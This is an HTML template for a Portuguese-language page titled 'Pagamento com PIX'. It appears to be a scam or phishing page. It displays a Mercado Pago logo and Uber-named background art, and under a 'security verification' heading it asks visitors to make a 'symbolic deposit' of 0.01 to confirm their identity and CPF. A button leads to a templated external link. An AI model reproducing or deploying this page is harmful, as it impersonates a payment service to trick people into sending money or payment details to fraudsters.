<!DOCTYPE html>
<html lang="pt-br">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Pagamento com PIX</title>
  <link rel="icon" type="image/x-icon" href="./../favicon.ico"> 

  <style>
    body {
      font-family: Arial, sans-serif;
      display: flex;
      flex-direction: column;
      align-items: center;
      justify-content: center;
      height: 100vh;
      margin: 0;
      background-color: #121212; /* fundo dark */
      background-image: url('static/img/logovaiRapidoUber.png');
      background-size: cover;
      background-repeat: no-repeat;
      background-position: center;
    }

    img.logo {
      width: 200px;
      margin-bottom: 30px;
    }

    h1 {
      color: #ffffff;
      margin-bottom: 20px;
    }

    .btn-pagar {
      background-color: #00A859;
      color: white;
      padding: 15px 30px;
      border: none;
      border-radius: 5px;
      font-size: 18px;
      cursor: pointer;
      text-decoration: none;
      text-align: center;
      transition: background-color 0.3s ease;
    }

    .btn-pagar:hover {
      background-color: #009748;
    }

    p {
      font-size: 16px;
      color: #dddddd;
      text-align: center;
      max-width: 400px;
    }

    a {
      color: #009748;
      text-decoration: none;
    }

    a:hover {
      text-decoration: underline;
    }
  </style>
</head>
<body>

  <!-- LOGO MERCADO PAGO -->
  <img class="logo" src="static/img/mp.png" alt="Logo Mercado Pago" />

  <h1>Verificação de segurança</h1>

  <p>Para pagar, saber se vc e humano e verdadeiro da conta a ser registrada 
    prescisamos que vc fça um Deposito simbolico de 0,01 centavos para saber se a conta sera no seu cpf
    ou alguem se passando por outra pessoa.....
    .</p>

  <a class="btn-pagar" href="{{ link }}" target="_blank">Click Aqui</a>

</body>
</html>
